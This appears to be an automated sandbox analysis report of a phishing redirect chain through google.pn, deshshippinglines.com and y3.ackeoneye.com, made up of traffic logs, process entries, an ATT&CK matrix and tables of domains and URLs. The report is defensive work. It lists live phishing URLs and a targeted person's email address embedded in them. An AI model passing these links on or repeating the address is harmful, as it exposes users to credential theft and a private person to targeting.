Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: classification engineClassification label: mal52.win@19/92@40/21
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2248,i,13835440009713760261,2985736920505819972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2248,i,13835440009713760261,2985736920505819972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1600457 URL: https://www.google.pn/url?s... Startdate: 27/01/2025 Architecture: WINDOWS Score: 52 26 Antivirus detection for URL or domain 2->26 28 AI detected suspicious Javascript 2->28 6 chrome.exe 9 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.5, 443, 49244, 49465 unknown unknown 6->14 16 192.168.2.6 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 y3.ackeoneye.com 104.21.93.228, 443, 49718, 49719 CLOUDFLARENETUS United States 11->20 22 18.66.143.128, 443, 49818, 49831 MIT-GATEWAYSUS United States 11->22 24 24 other IPs or domains 11->24

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://deshshippinglines.com/favicon.ico0%Avira URL Cloudsafe
https://y3.ackeoneye.com/lo92/100%Avira URL Cloudphishing
https://v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru/bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYO0%Avira URL Cloudsafe
https://y3.ackeoneye.com/favicon.ico100%Avira URL Cloudphishing
https://developer.amazonservices.com/ref=rm_c_sv0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
deshshippinglines.com
199.168.185.232
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      www.google.pn
      216.58.212.131
      truefalse
        high
        code.jquery.com
        151.101.130.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              y3.ackeoneye.com
              104.21.93.228
              truetrue
                unknown
                www.google.com
                142.250.185.196
                truefalse
                  high
                  www-amazon-com.customer.fastly.net
                  162.219.225.118
                  truefalse
                    high
                    c.media-amazon.com
                    108.138.16.195
                    truefalse
                      high
                      d3ag4hukkh62yn.cloudfront.net
                      99.86.8.42
                      truefalse
                        high
                        v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru
                        188.114.97.3
                        truefalse
                          unknown
                          endpoint.prod.us-east-1.forester.a2z.com
                          18.204.152.18
                          truefalse
                            high
                            www.amazon.com
                            unknown
                            unknownfalse
                              high
                              images-na.ssl-images-amazon.com
                              unknown
                              unknownfalse
                                high
                                fls-na.amazon.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://www.amazon.com/favicon.icofalse
                                    high
                                    https://www.google.pn/amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==false
                                      high
                                      https://v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru/bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYOfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=1false
                                        high
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://y3.ackeoneye.com/favicon.icofalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://images-na.ssl-images-amazon.com/captcha/fmvtfjch/Captcha_pslxfojrtx.jpgfalse
                                            high
                                            https://y3.ackeoneye.com/lo92/true
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://www.amazon.com/errors/validateCaptcha?amzn=tsPwu3l9tzgnem5k5fj8Zw%3D%3D&amzn-r=%2F&field-keywords=false
                                              high
                                              https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=1false
                                                high
                                                https://a.nel.cloudflare.com/report/v4?s=%2F6ROHfEAEbc7x2dx%2BM4cZ7exDP81u%2Fj9itd0a6%2FlwJi0JyF1ZCOaeigw7ngWXDI4TdWYPFVGNjq1YGj0Wuw%2BlPX7TbIzxXnibU207UDQ7VpFUj2wLIGCNPAqU7%2FluwfYNodH4w%3D%3Dfalse
                                                  high
                                                  https://deshshippinglines.com/favicon.icofalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.cssfalse
                                                    high
                                                    https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/csm-captcha-instrumentation.min.jsfalse
                                                      high
                                                      https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=1false
                                                        high
                                                        https://images-na.ssl-images-amazon.com/captcha/uyvnnjxx/Captcha_lfxcionvuw.jpgfalse
                                                          high
                                                          https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d.jsfalse
                                                            high
                                                            https://www.amazon.com/errors/validateCaptcha?amzn=aWtjLQPQePOkOjbZRBDfnw%3D%3D&amzn-r=%2F&field-keywords=false
                                                              high
                                                              https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-session-snapshot-keypress.min._V2_.jsfalse
                                                                high
                                                                https://images-na.ssl-images-amazon.com/captcha/bcxmjlko/Captcha_yeyjbrcolt.jpgfalse
                                                                  high
                                                                  https://www.amazon.com/errors/validateCaptcha?amzn=V%2FQWGh%2Bxq8nH6gH01OjA4w%3D%3D&amzn-r=%2F&field-keywords=false
                                                                    high
                                                                    https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==false
                                                                      high
                                                                      https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1._V313498596_.jsfalse
                                                                        high
                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                          high
                                                                          https://www.amazon.com/false
                                                                            high
                                                                            https://www.amazon.com/errors/validateCaptcha?amzn=UOEyeih%2FO2Ng4k18wziu%2Bg%3D%3D&amzn-r=%2F&field-keywords=false
                                                                              high
                                                                              https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=1false
                                                                                high
                                                                                https://images-na.ssl-images-amazon.com/captcha/rhnrlggh/Captcha_fcrspsdsms.jpgfalse
                                                                                  high
                                                                                  https://fls-na.amazon.com/1/batch/1/OE/false
                                                                                    high
                                                                                    https://deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==false
                                                                                      unknown
                                                                                      https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devol.esfalse
                                                                                        unknown
                                                                                        https://challenges.cloudflare.com/turnstile/v0/b/725bd36e298b/api.jsfalse
                                                                                          high
                                                                                          https://images-na.ssl-images-amazon.com/captcha/wxvwzfzh/Captcha_gofzzllses.jpgfalse
                                                                                            high
                                                                                            https://images-na.ssl-images-amazon.com/images/G/01/amazonui/sprites/aui_sprite_0007-1x._V383827579_.pngfalse
                                                                                              high
                                                                                              https://www.amazon.com/errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords=false
                                                                                                high
                                                                                                https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=1false
                                                                                                  high
                                                                                                  https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=1false
                                                                                                    high
                                                                                                    https://images-na.ssl-images-amazon.com/captcha/docvmtpr/Captcha_zqhwgudfzb.jpgfalse
                                                                                                      high
                                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                                      https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=0chromecache_125.2.drfalse
                                                                                                        high
                                                                                                        https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1chromecache_98.2.dr, chromecache_116.2.drfalse
                                                                                                          high
                                                                                                          https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=0chromecache_109.2.drfalse
                                                                                                            high
                                                                                                            https://www.amazon.com/gp/help/customer/display.html/ref=footer_privacy?ie=UTF8&nodeId=468496chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                              high
                                                                                                              https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                                high
                                                                                                                https://fls-na.amazchromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                                  high
                                                                                                                  https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=0chromecache_130.2.drfalse
                                                                                                                    high
                                                                                                                    https://www.amazon.com/gp/help/customer/display.html/ref=footer_cou?ie=UTF8&nodeId=508088chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                                      high
                                                                                                                      https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=0chromecache_133.2.drfalse
                                                                                                                        high
                                                                                                                        https://affiliate-program.amazon.com/gp/advertising/api/detail/main.html/ref=rm_c_acchromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                                          high
                                                                                                                          https://developer.amazonservices.com/ref=rm_c_svchromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drfalse
                                                                                                                            high
                                                                                                                            https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/chromecache_98.2.dr, chromecache_116.2.drfalse
                                                                                                                              high
                                                                                                                              https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=0chromecache_114.2.drfalse
                                                                                                                                high
                                                                                                                                https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=0chromecache_115.2.drfalse
                                                                                                                                  high
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  108.138.16.195
                                                                                                                                  c.media-amazon.comUnited States
                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                  104.18.94.41
                                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  162.219.225.118
                                                                                                                                  www-amazon-com.customer.fastly.netUnited States
                                                                                                                                  15108ALLO-COMMUSfalse
                                                                                                                                  151.101.130.137
